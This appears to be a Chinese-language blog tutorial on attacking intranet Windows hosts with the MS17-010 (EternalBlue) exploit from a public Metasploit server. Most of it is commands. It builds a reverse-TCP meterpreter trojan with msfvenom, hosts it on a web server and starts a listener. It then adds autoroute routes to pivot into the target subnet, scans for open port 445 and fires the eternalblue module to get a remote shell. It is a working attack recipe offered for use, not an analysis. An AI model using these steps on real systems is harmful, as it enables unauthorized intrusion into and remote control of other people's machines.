其实很多小白在对利用msf进行ms17010攻击的时候总是不成功，其实这都是因为网上大部分的文章都是写的内网对内网（192.168.1.2-->192.168.1.3）这样的案例，今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

一、准备工作

1.安装了Msf的公网主机+Ubuntu系统

2.一台其他服务器内网存在445漏洞

3.细心，细心，细心，钻研，钻研！！！

二、反弹一个shell

第一步：公网主机操作

生成msf木马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

第二步：Msf监听端口：6666

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 111.111.111.111

set LPORT 6666

exploit

添加路由

run get_local_subnets （获取当前路由）

run autoroute -s 192.168.3.0/24 （添加路由）

run autorouute -d //删除添加的路由 (有需要才用)

run autoroute -p （查看已添加路由）

使用Payload进行攻击

background（转换到后台）

use scanner/portscan/tcp （先扫描开放445端口的PC）

exploit（开始扫描）

注意：扫描出来开放了445端口的PC，不一定就存在445漏洞。（如何精准定位？）

如何列出那些存在445漏洞的PC？

使用MS17-010检测工具检测，github自行下载

攻击正式开始

use exploit/windows/smb/ms17_010_eternalblue（切换到攻击模块）

set rhost 192.168.3.38（设置存在445漏洞的PC电脑IP）

exploit（执行攻击）

攻击完成，并且会自动返回一个shell控制台

最新文章

1. iOS PCH文件
2. IOS Animation-CAShapeLayer、UIBezierPath与Animation的结合
3. 使用jquery获取url以及jquery获取url参数的方法
4. Linux（Centos）下jdbc连接oracle速度超慢的问题
5. 为 Macbook 安装 enca 命令
6. 【自动化测试】关于UI自动化的疑问（记录ing）
7. Masonry 布局 cell 高度适应的一种方案(实现类似朋友圈简单布局)
8. SharePoint 2010 Ribbon的实现
9. 导入android项目在eclipse中会报@Override错误
10. warning: control reaches end of non-void function
11. python文件操作精髓
12. 理清JavaScript正则表达式
13. PowerShell 远程执行任务
14. java怎样获取CPU占用率和硬盘占用率
15. Linux文件属性及权限
16. java新知识系列 三
17. Angular4 管道
18. dedecmsV5.7和discuz!X3.4整合之后免激活登陆
19. A1280. 最长双回文串
20. Eclipse Java注释模板设置详解以及版权声明

热门文章

1. https校验问题
2. traceback.print_exc()的用法
3. Oracle 撤回已经提交的事务
4. drop、truncate、delete的区别
5. 帆软报表（finereport）禁用右键
6. 震惊！！！！！！！靠sort水过二叉堆的天秀操作
7. Elasticsearch使用系列-Docker搭建Elasticsearch集群
8. [LeetCode]28.实现strStr()（Java）
9. 攻防世界之Web_php_unserialize
10. 「在 Kubernetes 上运行 Pgpool-Il」实现 PostgreSQL 查询(读)负载均衡和连接池